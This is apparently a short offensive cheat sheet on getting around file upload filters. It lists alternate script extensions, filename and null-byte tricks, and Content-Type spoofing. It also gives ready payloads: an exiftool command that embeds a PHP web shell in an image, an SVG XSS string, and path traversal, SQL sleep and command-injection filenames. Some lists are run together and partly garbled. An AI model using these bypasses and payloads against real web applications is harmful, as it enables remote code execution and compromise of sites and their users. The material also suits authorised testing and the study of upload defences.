Unrestricted File Upload

Name:

1. Use Alternate extensions:

PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module, phps, phpt, phtml, phtmSP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml, .asa(IIS <= 7.5), .aspx;1.jpg # (IIS < 7.0)sp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .actionColdfusion: .cfm, .cfml, .cfc, .dbmFlash: .swfPerl: .pl, .cgi, .pm, .libErlang Yaws Web Server: .yawsPerl: .pl, .pm, .cgi, .libColdfusion: .cfm, .cfml, .cfc, .dbm

2. Random capitalization: PhP, pHp, …

3. Adding special characters before or after the extension ( brute force with Burp ) :

%20%0a%00%0d/\.….….;./.\\x00file.php123png

4. Break limit: AA….AAA.php.png

5. Duplicate extension:

file.php.png.jpgfile.php%00.png

Content-Type:

Change from Content-type: application/x-php to Content-type: image/jpegMore: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt

Magic byte:

List of file signature: https://en.wikipedia.org/wiki/List_of_file_signatures

Exif:

exiftool -Comment=’<?php system($_REQUEST[‘cmd’]); ?>’ test.png

XSS:

<svg onload=alert(document.domain)>

Path Traversal

../../../file.png

SQLi

sleep(10) — -.jpg

RCE

a`whoami`z.jpg

a$(whoami)x.jpg

a;sleep 30;z.jpg